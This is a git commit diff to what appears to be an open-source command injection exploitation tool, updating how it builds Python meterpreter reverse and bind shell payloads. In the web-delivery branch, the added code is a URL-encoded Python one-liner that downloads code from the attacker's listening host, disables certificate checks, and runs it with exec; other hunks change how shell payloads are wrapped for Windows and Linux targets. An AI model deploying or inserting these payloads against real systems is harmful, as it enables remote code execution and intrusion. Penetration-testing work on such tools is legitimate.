Minor update regarding web delivery script (i.e. Python meterpreter reverse TCP shell).

stasinopoulos · stasinopoulos · commit 4a9e0a7ecc42 · 2021-06-30T08:24:40.000+03:00
diff --git a/doc/CHANGELOG.md b/doc/CHANGELOG.md
@@ -1,4 +1,5 @@
 ## Version 3.3 (TBA)
+* Updated: Minor update regarding web delivery script (i.e. Python meterpreter reverse TCP shell).
 * Replaced: The `--backticks` switch has been replaced with "backticks.py" tamper script.
 * Added: New tamper script "backticks.py" that uses backticks instead of "$()", for commands substitution. (for *nix targets).
 * Added: New option ( `--skip-heuristic`) for skipping dynamic code evaluation heuristic check.
diff --git a/src/core/shells/bind_tcp.py b/src/core/shells/bind_tcp.py
@@ -408,7 +408,7 @@ def other_bind_shells(separator):
         with open (output, "r") as content_file:
           data = content_file.readlines()
           data = ''.join(data)
-          data = base64.b64encode(data.encode(settings.UNICODE_ENCODING)).decode()
+          #data = base64.b64encode(data.encode(settings.UNICODE_ENCODING)).decode()
 
         print(settings.SINGLE_WHITESPACE)
         # Remove the ouput file.
@@ -422,9 +422,9 @@ def other_bind_shells(separator):
 
         if settings.TARGET_OS == "win" and not settings.USER_DEFINED_PYTHON_DIR: 
           set_python_working_dir()
-          other_shell = settings.WIN_PYTHON_DIR + " -c exec('" + data + "'.decode('base64'))"
+          other_shell = settings.WIN_PYTHON_DIR + " -c " + data 
         else:
-          other_shell = settings.LINUX_PYTHON_INTERPRETER + " -c \"exec('" + data + "'.decode('base64'))\""
+          other_shell = settings.LINUX_PYTHON_INTERPRETER + " -c " + "\"" + data + "\""
         msf_launch_msg(output)
       except:
         print(settings.SINGLE_WHITESPACE)
diff --git a/src/core/shells/reverse_tcp.py b/src/core/shells/reverse_tcp.py
@@ -446,7 +446,7 @@ def other_reverse_shells(separator):
         with open (output, "r") as content_file:
           data = content_file.readlines()
           data = ''.join(data)
-          data = base64.b64encode(data.encode(settings.UNICODE_ENCODING)).decode()
+          #data = base64.b64encode(data.encode(settings.UNICODE_ENCODING)).decode()
 
         print(settings.SINGLE_WHITESPACE)
         # Remove the ouput file.
@@ -460,9 +460,9 @@ def other_reverse_shells(separator):
 
         if settings.TARGET_OS == "win" and not settings.USER_DEFINED_PYTHON_DIR: 
           set_python_working_dir()
-          other_shell = settings.WIN_PYTHON_DIR + " -c exec('" + data + "'.decode('base64'))"
+          other_shell = settings.WIN_PYTHON_DIR + " -c " + data 
         else:
-          other_shell = settings.LINUX_PYTHON_INTERPRETER + " -c \"exec('" + data + "'.decode('base64'))\""
+          other_shell = settings.LINUX_PYTHON_INTERPRETER + " -c " + "\"" + data + "\""
         msf_launch_msg(output)
       except:
         print(settings.SINGLE_WHITESPACE)
@@ -632,13 +632,12 @@ def other_reverse_shells(separator):
                             "exploit\n\n")
 
           if web_delivery == '1':
-            data = "; r=_urllib.request.urlopen('http://" + str(settings.LHOST) + ":" + str(settings.SRVPORT) + settings.URIPATH + "'); exec(r.read());"
-            data = base64.b64encode(data.encode(settings.UNICODE_ENCODING)).decode()
+            data = "import sys%3bimport ssl%3bu%3d__import__('urllib'%2b{2%3a'',3%3a'.request'}[sys.version_info[0]],fromlist%3d('urlopen',))%3br%3du.urlopen('http://" + str(settings.LHOST) + ":" + str(settings.SRVPORT) + settings.URIPATH + "',context%3dssl._create_unverified_context())%3bexec(r.read())%3b"
             if settings.TARGET_OS == "win" and not settings.USER_DEFINED_PYTHON_DIR: 
               set_python_working_dir()
-              other_shell = settings.WIN_PYTHON_DIR + " -c exec('" + data + "'.decode('base64'))"
+              other_shell = settings.WIN_PYTHON_DIR + " -c " + data 
             else:
-              other_shell = settings.LINUX_PYTHON_INTERPRETER + " -c \"exec('" + data + "'.decode('base64'))\""
+              other_shell = settings.LINUX_PYTHON_INTERPRETER + " -c " + "\"" + data + "\""
             msf_launch_msg(output)
             break
           elif web_delivery == '2':
diff --git a/src/utils/settings.py b/src/utils/settings.py
@@ -216,7 +216,7 @@ def sys_argv_errors():
 DESCRIPTION = "The command injection exploiter"
 AUTHOR  = "Anastasios Stasinopoulos"
 VERSION_NUM = "3.3"
-REVISION = "44"
+REVISION = "45"
 STABLE_RELEASE = False
 if STABLE_RELEASE:
   VERSION = "v" + VERSION_NUM + "-stable"

Original file line number	Diff line number	Diff line change
`@@ -1,4 +1,5 @@`
`1`	`1`	`## Version 3.3 (TBA)`
	`2`	`+* Updated: Minor update regarding web delivery script (i.e. Python meterpreter reverse TCP shell).`
`2`	`3`	* Replaced: The `--backticks` switch has been replaced with "backticks.py" tamper script.
`3`	`4`	`* Added: New tamper script "backticks.py" that uses backticks instead of "$()", for commands substitution. (for *nix targets).`
`4`	`5`	* Added: New option ( `--skip-heuristic`) for skipping dynamic code evaluation heuristic check.